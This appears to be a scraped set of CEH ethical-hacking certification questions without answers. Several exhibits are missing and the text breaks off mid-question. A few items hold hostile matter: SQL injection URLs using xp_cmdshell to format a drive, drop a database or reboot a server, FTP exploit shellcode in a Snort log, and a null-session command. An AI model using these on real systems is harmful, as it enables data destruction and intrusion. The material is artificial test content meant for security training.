
CEH-001 Questions and Answers

Question # 6

What do you call a system where users need to remember only one username and password, and be authenticated for multiple services?

A.

Simple Sign-on

B.

Unique Sign-on

C.

Single Sign-on

D.

Digital Certificate

Question # 7

What is the tool Firewalk used for?

A.

To test the IDS for proper operation

B.

To test a firewall for proper operation

C.

To determine what rules are in place for a firewall

D.

To test the webserver configuration

E.

Firewalk is a firewall auto configuration tool

Question # 8

Melissa is a virus that attacks Microsoft Windows platforms.

To which category does this virus belong?

A.

Polymorphic

B.

Boot Sector infector

C.

System

D.

Macro

Question # 9

Exhibit:

You are conducting a pen-test against a company’s website using SQL Injection techniques. You enter “anuthing or 1=1-“ in the username field of an authentication form. This is the output returned from the server.

What is the next step you should do?

A.

Identify the user context of the web application by running:

http://www.example.com/order/include_rsa_asp?pressReleaseID=5

AND

USER_NAME() = ‘dbo’

B.

Identify the database and table name by running:

http://www.example.com/order/include_rsa.asp?pressReleaseID=5

AND

ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE

xtype=’U’), 1))) > 109

C.

Format the C: drive and delete the database by running:

http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND

xp_cmdshell ‘format c: /q /yes ‘; drop database myDB; --

D.

Reboot the web server by running:

http://www.example.com/order/include_rsa.asp?pressReleaseID=5

AND xp_cmdshell ‘iisreset –reboot’; --

Question # 10

Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit.

Choose the attack type from the choices given below.

A.

Database Fingerprinting

B.

Database Enumeration

C.

SQL Fingerprinting

D.

SQL Enumeration

Question # 11

Exhibit:

TCP TTL:50 TOS:0x0 ID:53476 DF

*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78

TCP Options => NOP NOP TS: 126045057 105803098

50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….

90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD …….1.1.1..F.

80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?…k^

31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f…..

27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB ‘..1..^..=..1.1.

8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1…1..^..

0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 …..u.1..F..^..

3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =…..0…F.1..F

07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F….N..V..

0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF …1.1……….

FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 …0bin0sh1..11v

65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 englin@kocham.ka

73 69 65 2E 63 6F 6D 0D 0A sie.com..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882

TCP TTL:63 TOS:0x10 ID:48231 DF

*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78

TCP Options => NOP NOP TS: 105803113 126045057

35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr

65 63 74 2E 0D 0A ect…

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882

TCP TTL:63 TOS:0x10 ID:48233 DF

*****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78

TCP Options => NOP NOP TS: 105803984 126045931

32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at

20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb

79 65 2E 0D 0A ye…

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882

TCP TTL:63 TOS:0x10 ID:48234 DF

***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78

TCP Options => NOP NOP TS: 105803984 126045931

Given the following extract from the snort log on a honeypot, what service is being exploited?

A.

FTP

B.

SSH

C.

Telnet

D.

SMTP

Question # 12

ETHER: Destination address : 0000BA5EBA11 ETHER: Source address :

An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. Which of the following strategies can be used to defeat detection by a network-based IDS application?

A.

Create a SYN flood

B.

Create a network tunnel

C.

Create multiple false positives

D.

Create a ping flood

Question # 13

The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() in the source code. These C++ functions do not check bounds.

What kind of attack is this program susceptible to?

A.

Buffer of Overflow

B.

Denial of Service

C.

Shatter Attack

D.

Password Attack

Question # 14

In an attempt to secure his 802.11b wireless network, Ulf decides to use strategic antenna positioning. He places the antenna for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building’s center. There is a large parking lot and outlying field surrounding the building that extends out half a mile around the building. Ulf figures that with this and his placement of antennas, his wireless network will be safe from attack.

Which of the following statements is true?

A.

With the 300 feet limit of a wireless signal, Ulf’s network is safe.

B.

Wireless signals can be detected from miles away, Ulf’s network is not safe.

C.

Ulf’s network will be safe but only if he doesn’t switch to 802.11a.

D.

Ulf’s network will not be safe until he also enables WEP.

Question # 15

Joe the Hacker breaks into XYZ’s Linux system and plants a wiretap program in order to sniff passwords and user accounts off the wire. The wiretap program is embedded as a Trojan horse in one of the network utilities. Joe is worried that the network administrator might detect the wiretap program by querying the interfaces to see if they are running in promiscuous mode.

What can Joe do to hide the wiretap program from being detected by the ifconfig command?

A.

Block output to the console whenever the user runs the ifconfig command by running a screen capture utility

B.

Run the wiretap program in stealth mode from being detected by the ifconfig command.

C.

Replace original ifconfig utility with the rootkit version of ifconfig hiding Promiscuous information being displayed on the console.

D.

You cannot disable Promiscuous mode detection on Linux systems.

Question # 16

You perform the above traceroute and notice that hops 19 and 20 both show the same IP address.

This probably indicates what?

A.

A host based IDS

B.

A Honeypot

C.

A stateful inspection firewall

D.

An application proxying firewall

Question # 17

Your boss Tess King is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack?

A.

SQL Input attack

B.

SQL Piggybacking attack

C.

SQL Select attack

D.

SQL Injection attack

Question # 18

If an e-commerce site was put into a live environment and the programmers failed to remove the secret entry point that was used during the application development, what is this secret entry point known as?

A.

SDLC process

B.

Honey pot

C.

SQL injection

D.

Trap door

Question # 19

Which of the following tools can be used to perform a zone transfer?

A.

NSLookup

B.

Finger

C.

Dig

D.

Sam Spade

E.

Host

F.

Netcat

G.

Neotrace

Question # 20

While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect's workstation. He comes across a file that is just called "file.txt" but when he opens it, he finds the following:

What can he infer from this file?

A.

A picture that has been renamed with a .txt extension

B.

An encrypted file

C.

An encoded file

D.

A buffer overflow

Question # 21

Exhibit

(Note: the student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.)

Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal?

What is odd about this attack? Choose the best answer.

A.

This is not a spoofed packet as the IP stack has increasing numbers for the three flags.

B.

This is back orifice activity as the scan comes from port 31337.

C.

The attacker wants to avoid creating a sub-carrier connection that is not normally valid.

D.

These packets were crafted by a tool, they were not created by a standard IP stack.

Question # 22

Cyber Criminals have long employed the tactic of masking their true identity. In IP spoofing, an attacker gains unauthorized access to a computer or a network by making it appear that a malicious message has come from a trusted machine, by "spoofing" the IP address of that machine.

How would you detect IP spoofing?

A.

Check the IPID of the spoofed packet and compare it with TLC checksum. If the numbers match then it is spoofed packet

B.

Probe a SYN Scan on the claimed host and look for a response SYN/FIN packet, if the connection completes then it is a spoofed packet

C.

Turn on 'Enable Spoofed IP Detection' in Wireshark, you will see a flag tick if the packet is spoofed

D.

Sending a packet to the claimed host will result in a reply. If the TTL in the reply is not the same as the packet being checked then it is a spoofed packet

Question # 23

Maintaining a secure Web server requires constant effort, resources, and vigilance from an organization. Securely administering a Web server on a daily basis is an essential aspect of Web server security.

Maintaining the security of a Web server will usually involve the following steps:

1. Configuring, protecting, and analyzing log files

2. Backing up critical information frequently

3. Maintaining a protected authoritative copy of the organization's Web content

4. Establishing and following procedures for recovering from compromise

5. Testing and applying patches in a timely manner

6. Testing security periodically.

In which step would you engage a forensic investigator?

A.

1

B.

2

C.

3

D.

4

E.

5

F.

6

Question # 24

Which of the following statements correctly define an ICMP Flood Attack? (Select 2 answers)

A.

Bogus ECHO reply packets are flooded on the network spoofing the IP and MAC address

B.

The ICMP packets signal the victim system to reply and the combination of traffic saturates the bandwidth of the victim's network

C.

ECHO packets are flooded on the network saturating the bandwidth of the subnet causing denial of service

D.

A DDoS ICMP flood attack occurs when the zombies send large volumes of ICMP_ECHO_REPLY packets to the victim system.

Question # 25

A common technique for luring e-mail users into opening virus-launching attachments is to send messages that would appear to be relevant or important to many of their potential recipients. One way of accomplishing this feat is to make the virus-carrying messages appear to come from some type of business entity retailing sites, UPS, FEDEX, CITIBANK or a major provider of a common service.

Here is a fraudulent e-mail claiming to be from FedEx regarding a package that could not be delivered. This mail asks the receiver to open an attachment in order to obtain the FEDEX tracking number for picking up the package. The attachment contained in this type of e-mail activates a virus.

Vendors send e-mails like this to their customers advising them not to open any files attached with the mail, as they do not include attachments.

Both fraudulent and legitimate e-mails that arrive in your inbox show fedex.com as the sender of the mail.

How do you verify that the e-mail is authentic and sent from fedex.com?

A.

Verify the digital signature attached with the mail, the fake mail will not have Digital ID at all

B.

Check the Sender ID against the National Spam Database (NSD)

C.

Fake mail will have spelling/grammatical errors

D.

Fake mail uses extensive images, animation and flash content

Question # 26

What is the problem with this ASP script (login.asp)?

A.

The ASP script is vulnerable to Cross Site Scripting attack

B.

The ASP script is vulnerable to Session Splice attack

C.

The ASP script is vulnerable to XSS attack

D.

The ASP script is vulnerable to SQL Injection attack

Question # 27

You are the security administrator of Jaco Banking Systems located in Boston. You are setting up the e-banking website (http://www.ejacobank.com) authentication system. Instead of issuing banking customers a single password, you give them a printed list of 100 unique passwords. Each time the customer needs to log into the e-banking system website, the customer enters the next password on the list. If someone sees them type the password using shoulder surfing, MiTM or keyloggers, then no damage is done because the password will not be accepted a second time. Once the list of 100 passwords is almost finished, the system automatically sends out a new password list by encrypted e-mail to the customer.

You are confident that this security implementation will protect the customer from password abuse.

Two months later, a group of hackers called "HackJihad" found a way to access the one-time password list issued to customers of Jaco Banking Systems. The hackers set up a fake website (http://www.e-jacobank.com) and used phishing attacks to direct ignorant customers to it. The fake website asked users for their e-banking username and password, and the next unused entry from their one-time password sheet. The hackers collected 200 customers' usernames/passwords this way. They transferred money from the customers' bank accounts to various offshore accounts.

Your decision of password policy implementation has cost the bank USD 925,000 to hackers. You immediately shut down the e-banking website while figuring out the next best security solution.

What effective security solution will you recommend in this case?

A.

Implement Biometrics based password authentication system. Record the customers face image to the authentication database

B.

Configure your firewall to block logon attempts of more than three wrong tries

C.

Enable a complex password policy of 20 characters and ask the user to change the password immediately after they logon and do not store password histories

D.

Implement RSA SecureID based authentication system

Question # 28

David is a security administrator working in Boston. David has been asked by the office's manager to block all POP3 traffic at the firewall because he believes employees are spending too much time reading personal email. How can David block POP3 at the firewall?

A.

David can block port 125 at the firewall.

B.

David can block all EHLO requests that originate from inside the office.

C.

David can stop POP3 traffic by blocking all HELO requests that originate from inside the office.

D.

David can block port 110 to block all POP3 traffic.

Question # 29

TCP/IP Session Hijacking is carried out in which OSI layer?

A.

Datalink layer

B.

Transport layer

C.

Network layer

D.

Physical layer

Question # 30

Attackers footprint target Websites using Google Hacking techniques. Google hacking is a term that refers to the art of creating complex search engine queries. It detects websites that are vulnerable to numerous exploits and vulnerabilities. Google operators are used to locate specific strings of text within the search results.

The configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. WordPress uses config.php that stores the database Username and Password.

Which of the Google search strings below brings up sites with "config.php" files?

A.

Search:index config/php

B.

Wordpress:index config.php

C.

intitle:index.of config.php

D.

Config.php:index list

Question # 31

In Trojan terminology, what is required to create the executable file chess.exe as shown below?

A.

Mixer

B.

Converter

C.

Wrapper

D.

Zipper

Question # 32

You just purchased the latest DELL computer, which comes pre-installed with Windows 7, McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it.

A.

New installation of Windows should be patched by installing the latest service packs and hotfixes

B.

Key applications such as Adobe Acrobat, Macromedia Flash, Java, Winzip etc., must have the latest security patches installed

C.

Install a personal firewall and lock down unused ports from connecting to your computer

D.

Install the latest signatures for Antivirus software

E.

Configure "Windows Update" to automatic

F.

Create a non-admin user with a complex password and logon to this account

G.

You can start using your computer as vendors such as DELL, HP and IBM would have already installed the latest service packs.

Question # 33

This type of Port Scanning technique splits the TCP header into several packets so that the packet filters are not able to detect what the packets intend to do.

A.

UDP Scanning

B.

IP Fragment Scanning

C.

Inverse TCP flag scanning

D.

ACK flag scanning

Question # 34

Which of the following tools would be considered a Signature Integrity Verifier (SIV)?

A.

Nmap

B.

SNORT

C.

VirusSCAN

D.

Tripwire

Question # 35

What type of Trojan is this?

A.

RAT Trojan

B.

E-Mail Trojan

C.

Defacement Trojan

D.

Destructing Trojan

E.

Denial of Service Trojan

Question # 36

Google uses a unique cookie for each browser used by an individual user on a computer. This cookie contains information that allows Google to identify records about that user on its database. This cookie is submitted every time a user launches a Google search, visits a site using AdSense etc. The information stored in Google's database, identified by the cookie, includes

  • Everything you search for using Google
  • Every web page you visit that has Google Adsense ads

How would you prevent Google from storing your search keywords?

A.

Block Google Cookie by applying Privacy and Security settings in your web browser

B.

Disable the Google cookie using Google Advanced Search settings on Google Search page

C.

Do not use Google but use another search engine Bing which will not collect and store your search keywords

D.

Use MAC OS X instead of Windows 7. Mac OS has higher level of privacy controls by default.

Question # 37

Syslog is a standard for logging program messages. It allows separation of the software that generates messages from the system that stores them and the software that reports and analyzes them. It also provides devices, which would otherwise be unable to communicate, a means to notify administrators of problems or performance.

What default port does the Syslog daemon listen on?

A.

242

B.

312

C.

416

D.

514

Question # 38

Samuel is the network administrator of DataX Communications, Inc. He is trying to configure his firewall to block password brute force attempts on his network. He enables blocking the intruder's IP address for a period of 24 hours' time after more than three unsuccessful attempts. He is confident that this rule will secure his network from hackers on the Internet.

But he still receives hundreds of thousands of brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall rule.

Later he adds another rule to his firewall and enables a small sleep on the password attempt so that if the password is incorrect, it would take 45 seconds to return to the user to begin another attempt. Since an intruder may use multiple machines to brute force the password, he also throttles the number of connections that will be accepted from a particular IP address. This action will slow the intruder's attempts.

Samuel wants to completely block hackers' brute-force attempts on his network.

What are the alternatives to defending against possible brute-force password attacks on his site?

A.

Enforce a password policy and use account lockouts after three wrong logon attempts even though this might lock out legit users

B.

Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the Firewall manually

C.

Enforce complex password policy on your network so that passwords are more difficult to brute force

D.

You cannot completely block the intruders attempt if they constantly switch proxies

Question # 39

To what concept does “message repudiation” refer in the realm of email security?

A.

Message repudiation means a user can validate which mail server or servers a message was passed through.

B.

Message repudiation means a user can claim damages for a mail message that damaged their reputation.

C.

Message repudiation means a recipient can be sure that a message was sent from a particular person.

D.

Message repudiation means a recipient can be sure that a message was sent from a certain host.

E.

Message repudiation means a sender can claim they did not actually send a particular message.

Question # 40

What ICMP message types are used by the ping command?

A.

Timestamp request (13) and timestamp reply (14)

B.

Echo request (8) and Echo reply (0)

C.

Echo request (0) and Echo reply (1)

D.

Ping request (1) and Ping reply (2)

Question # 41

MX record priority increases as the number increases. (True/False)

A.

True

B.

False

Question # 42

Which of the following activities will NOT be considered as passive footprinting?

A.

Go through the rubbish to find out any information that might have been discarded.

B.

Search on financial site such as Yahoo Financial to identify assets.

C.

Scan the range of IP address found in the target DNS database.

D.

Perform multiple queries using a search engine.

Question # 43

While performing ping scans into a target network you get a frantic call from the organization’s security team. They report that they are under a denial of service attack. When you stop your scan, the smurf attack event stops showing up on the organization’s IDS monitor. How can you modify your scan to prevent triggering this event in the IDS?

A.

Scan more slowly.

B.

Do not scan the broadcast IP.

C.

Spoof the source IP address.

D.

Only scan the Windows systems.

Question # 44

Sandra has been actively scanning the client network on which she is doing a vulnerability assessment test. While conducting a port scan she notices open ports in the range of 135 to 139. What protocol is most likely to be listening on those ports?

A.

Finger

B.

FTP

C.

Samba

D.

SMB

Question # 45

A distributed port scan operates by:

A.

Blocking access to the scanning clients by the targeted host

B.

Using denial-of-service software against a range of TCP ports

C.

Blocking access to the targeted host by each of the distributed scanning clients

D.

Having multiple computers each scan a small number of ports, then correlating the results

Question # 46

What flags are set in an X-MAS scan? (Choose all that apply.)

A.

SYN

B.

ACK

C.

FIN

D.

PSH

E.

RST

F.

URG

Question # 47

Study the log below and identify the scan type.

A.

nmap -sR 192.168.1.10

B.

nmap -sS 192.168.1.10

C.

nmap -sV 192.168.1.10

D.

nmap -sO -T 192.168.1.10

Question # 48

What port scanning method involves sending spoofed packets to a target system and then looking for adjustments to the IPID on a zombie system?

A.

Blind Port Scanning

B.

Idle Scanning

C.

Bounce Scanning

D.

Stealth Scanning

E.

UDP Scanning

Question # 49

What is the following command used for?

net use \\target\ipc$ "" /u:""

A.

Grabbing the etc/passwd file

B.

Grabbing the SAM

C.

Connecting to a Linux computer through Samba.

D.

This command is used to connect as a null session

E.

Enumeration of Cisco routers

Question # 50

You are manually conducting Idle Scanning using Hping2. During your scanning you notice that almost every query increments the IPID regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Why do you think this occurs?

A.

The zombie you are using is not truly idle.

B.

A stateful inspection firewall is resetting your queries.

C.

Hping2 cannot be used for idle scanning.

D.

These ports are actually open on the target system.

Question # 51

Under which Federal Statutes does the FBI investigate computer crimes involving e-mail scams and mail fraud?

A.

18 U.S.C 1029 Possession of Access Devices

B.

18 U.S.C 1030 Fraud and related activity in connection with computers

C.

18 U.S.C 1343 Fraud by wire, radio or television

D.

18 U.S.C 1361 Injury to Government Property

E.

18 U.S.C 1362 Government communication systems

F.

18 U.S.C 1831 Economic Espionage Act

G.

18 U.S.C 1832 Trade Secrets Act

Question # 52

Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal?

05/20-17:0645.061034 192.160.13.4:31337 --> 172.16.1.101:1

TCP TTL:44 TOS:0x10 ID:242

***FRP** Seq:0xA1D95  Ack:0x53  Win: 0x400

What is odd about this attack? (Choose the most appropriate statement)

A.

This is not a spoofed packet as the IP stack has increasing numbers for the three flags.

B.

This is back orifice activity as the scan comes from port 31337.

C.

The attacker wants to avoid creating a sub-carrier connection that is not normally valid.

D.

These packets were created by a tool; they were not created by a standard IP stack.

Question # 53

Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common?

A.

They are written in Java.

B.

They send alerts to security monitors.

C.

They use the same packet analysis engine.

D.

They use the same packet capture utility.

Question # 54

An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and risk assessments. A friend recently started a company and asks the hacker to perform a penetration test and vulnerability assessment of the new company as a favor. What should the hacker's next step be before starting work on this job?

A.

Start by foot printing the network and mapping out a plan of attack.

B.

Ask the employer for authorization to perform the work outside the company.

C.

Begin the reconnaissance phase with passive information gathering and then move into active information gathering.

D.

Use social engineering techniques on the friend's employees to help identify areas that may be susceptible to attack.

Question # 55

Which of the following is used to indicate a single-line comment in structured query language (SQL)?

A.

--

B.

||

C.

%%

D.

''

Question # 56

Which statement best describes a server type under an N-tier architecture?

A.

A group of servers at a specific layer

B.

A single server with a specific role

C.

A group of servers with a unique role

D.

A single server at a specific layer

Question # 57

A hacker is attempting to see which IP addresses are currently active on a network. Which NMAP switch would the hacker use?

A.

-sO

B.

-sP

C.

-sS

D.

-sU

Question # 58

Which property ensures that a hash function will not produce the same hashed value for two different messages?

A.

Collision resistance

B.

Bit length

C.

Key strength

D.

Entropy

Question # 59

Which of the following descriptions is true about a static NAT?

A.

A static NAT uses a many-to-many mapping.

B.

A static NAT uses a one-to-many mapping.

C.

A static NAT uses a many-to-one mapping.

D.

A static NAT uses a one-to-one mapping.

Question # 60

WPA2 uses AES for wireless data encryption at which of the following encryption levels?

A.

64 bit and CCMP

B.

128 bit and CRC

C.

128 bit and CCMP

D.

128 bit and TKIP

Question # 61

A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company’s internal network. Which of the following can be implemented to minimize the opportunity for a man-in-the-middle attack to occur?

A.

SSL

B.

Mutual authentication

C.

IPSec

D.

Static IP addresses

Question # 62

Which of the following can the administrator do to verify that a tape backup can be recovered in its entirety?

A.

Restore a random file.

B.

Perform a full restore.

C.

Read the first 512 bytes of the tape.

D.

Read the last 512 bytes of the tape.

Question # 63

Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server must have in order to properly function?

A.

Fast processor to help with network traffic analysis

B.

They must be dual-homed

C.

Similar RAM requirements

D.

Fast network interface cards

Question # 64

A pentester is using Metasploit to exploit an FTP server and pivot to a LAN. How will the pentester pivot using Metasploit?

A.

Issue the pivot exploit and set the meterpreter.

B.

Reconfigure the network settings in the meterpreter.

C.

Set the payload to propagate through the meterpreter.

D.

Create a route statement in the meterpreter.

Question # 65

Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below. What conclusions can be drawn based on these scan results?

TCP port 21 – no response

TCP port 22 – no response

TCP port 23 – Time-to-live exceeded

A.

The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host.

B.

The lack of response from ports 21 and 22 indicates that those services are not running on the destination server.

C.

The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall.

D.

The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond with a TTL error.

Question # 66

Pentest results indicate that voice over IP traffic is traversing a network. Which of the following tools will decode a packet capture and extract the voice conversations?

A.

Cain

B.

John the Ripper

C.

Nikto

D.

Hping

Question # 67

A penetration tester is hired to do a risk assessment of a company's DMZ. The rules of engagement state that the penetration test be done from an external IP address with no prior knowledge of the internal IT systems. What kind of test is being performed?

A.

white box

B.

grey box

C.

red box

D.

black box

Question # 68

Which of the following are variants of mandatory access control mechanisms? (Choose two.)

A.

Two factor authentication

B.

Acceptable use policy

C.

Username / password

D.

User education program

E.

Sign in register

Question # 69

Which results will be returned with the following Google search query?

site:target.com -site:Marketing.target.com accounting

A.

Results matching all words in the query

B.

Results matching “accounting” in domain target.com but not on the site Marketing.target.com

C.

Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting

D.

Results for matches on target.com and Marketing.target.com that include the word “accounting”

Question # 70

Which tool can be used to silently copy files from USB devices?

A.

USB Grabber

B.

USB Dumper

C.

USB Sniffer

D.

USB Snoopy

Question # 71

When creating a security program, which approach would be used if senior management is supporting and enforcing the security policy?

A.

A bottom-up approach

B.

A top-down approach

C.

A senior creation approach

D.

An IT assurance approach

Question # 72

When comparing the testing methodologies of Open Web Application Security Project (OWASP) and Open Source Security Testing Methodology Manual (OSSTMM) the main difference is

A.

OWASP is for web applications and OSSTMM does not include web applications.

B.

OSSTMM is gray box testing and OWASP is black box testing.

C.

OWASP addresses controls and OSSTMM does not.

D.

OSSTMM addresses controls and OWASP does not.

Question # 73

Which command lets a tester enumerate alive systems in a class C network via ICMP using native Windows tools?

A.

ping 192.168.2.

B.

ping 192.168.2.255

C.

for %V in (1 1 255) do PING 192.168.2.%V

D.

for /L %V in (1 1 254) do PING -n 1 192.168.2.%V | FIND /I "Reply"

Question # 74

Which of the following problems can be solved by using Wireshark?

A.

Tracking version changes of source code

B.

Checking creation dates on all webpages on a server

C.

Resetting the administrator password on multiple systems

D.

Troubleshooting communication resets between two systems

Question # 75

Which NMAP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection?

A.

NMAP -PN -A -O -sS 192.168.2.0/24

B.

NMAP -P0 -A -O -p1-65535 192.168.0/24

C.

NMAP -P0 -A -sT -p0-65535 192.168.0/16

D.

NMAP -PN -O -sS -p 1-1024 192.168.0/8

Question # 76

Which of the following programs is usually targeted at Microsoft Office products?

A.

Polymorphic virus

B.

Multipart virus

C.

Macro virus

D.

Stealth virus

Question # 77

Windows file servers commonly hold sensitive files, databases, passwords and more. Which of the following choices would be a common vulnerability that usually exposes them?

A.

Cross-site scripting

B.

SQL injection

C.

Missing patches

D.

CRLF injection

Question # 78

A Security Engineer at a medium-sized accounting firm has been tasked with discovering how much information can be obtained from the firm's public-facing web servers. The engineer decides to start by using netcat to connect to port 80.

The engineer receives this output:

HTTP/1.1 200 OK

Server: Microsoft-IIS/6

Expires: Tue, 17 Jan 2011 01:41:33 GMT

Date: Mon, 16 Jan 2011 01:41:33 GMT

Content-Type: text/html

Accept-Ranges: bytes

Last-Modified: Wed, 28 Dec 2010 15:32:21 GMT

ETag: "b0aac0542e25c31:89d"

Content-Length: 7369

Which of the following is an example of what the engineer performed?

A.

Cross-site scripting

B.

Banner grabbing

C.

SQL injection

D.

Whois database query

Question # 79

Employees in a company are no longer able to access Internet web sites on their computers. The network administrator is able to successfully ping the IP addresses of web servers on the Internet and is able to open web sites by using an IP address in place of the URL. The administrator runs the nslookup command for www.eccouncil.org and receives an error message stating there is no response from the server. What should the administrator do next?

A.

Configure the firewall to allow traffic on TCP port 53 and UDP port 53.

B.

Configure the firewall to allow traffic on TCP port 80 and UDP port 443.

C.

Configure the firewall to allow traffic on TCP port 53.

D.

Configure the firewall to allow traffic on TCP port 8080.

Question # 80

Which command line switch would be used in NMAP to perform operating system detection?

A.

-OS

B.

-sO

C.

-sP

D.

-O

Question # 81

Which of the following settings enables Nessus to detect when it is sending too many packets and the network pipe is approaching capacity?

A.

Netstat WMI Scan

B.

Silent Dependencies

C.

Consider unscanned ports as closed

D.

Reduce parallel connections on congestion

Question # 82

What is the correct PCAP filter to capture all TCP traffic going to or from host 192.168.0.125 on port 25?

A.

tcp.src == 25 and ip.host == 192.168.0.125

B.

host 192.168.0.125:25

C.

port 25 and host 192.168.0.125

D.

tcp.port == 25 and ip.host == 192.168.0.125

Question # 83

While conducting a penetration test, the tester determines that there is a firewall between the tester's machine and the target machine. The firewall is only monitoring TCP handshaking of packets at the session layer of the OSI model. Which type of firewall is the tester trying to traverse?

A.

Packet filtering firewall

B.

Application-level firewall

C.

Circuit-level gateway firewall

D.

Stateful multilayer inspection firewall

Question # 84

A penetration tester is conducting a port scan on a specific host. The tester found several open ports that made it difficult to conclude which Operating System (OS) version is installed. Considering the NMAP result below, which of the following is likely to be installed on the target machine by the OS?

Starting NMAP 5.21 at 2011-03-15 11:06

NMAP scan report for 172.16.40.65

Host is up (1.00s latency).

Not shown: 993 closed ports

PORT STATE SERVICE

21/tcp open ftp

23/tcp open telnet

80/tcp open http

139/tcp open netbios-ssn

515/tcp open

631/tcp open ipp

9100/tcp open

MAC Address: 00:00:48:0D:EE:89

A.

The host is likely a Windows machine.

B.

The host is likely a Linux machine.

C.

The host is likely a router.

D.

The host is likely a printer.

Question # 85

A consultant has been hired by the V.P. of a large financial organization to assess the company's security posture. During the security testing, the consultant comes across child pornography on the V.P.'s computer. What is the consultant's obligation to the financial organization?

A.

Say nothing and continue with the security testing.

B.

Stop work immediately and contact the authorities.

C.

Delete the pornography, say nothing, and continue security testing.

D.

Bring the discovery to the financial organization's human resource department.

Question # 86

Which tool is used to automate SQL injections and exploit a database by forcing a given web application to connect to another database controlled by a hacker?

A.

DataThief

B.

NetCat

C.

Cain and Abel

D.

SQLInjector

Question # 87

If an attacker's computer sends an IPID of 24333 to a zombie (Idle Scanning) computer on a closed port, what will be the response?

A.

The zombie computer will respond with an IPID of 24334.

B.

The zombie computer will respond with an IPID of 24333.

C.

The zombie computer will not send a response.

D.

The zombie computer will respond with an IPID of 24335.

Question # 88

The traditional traceroute sends out ICMP ECHO packets with a TTL of one, and increments the TTL until the destination has been reached. By printing the gateways that generate ICMP time exceeded messages along the way, it is able to determine the path packets take to reach the destination.

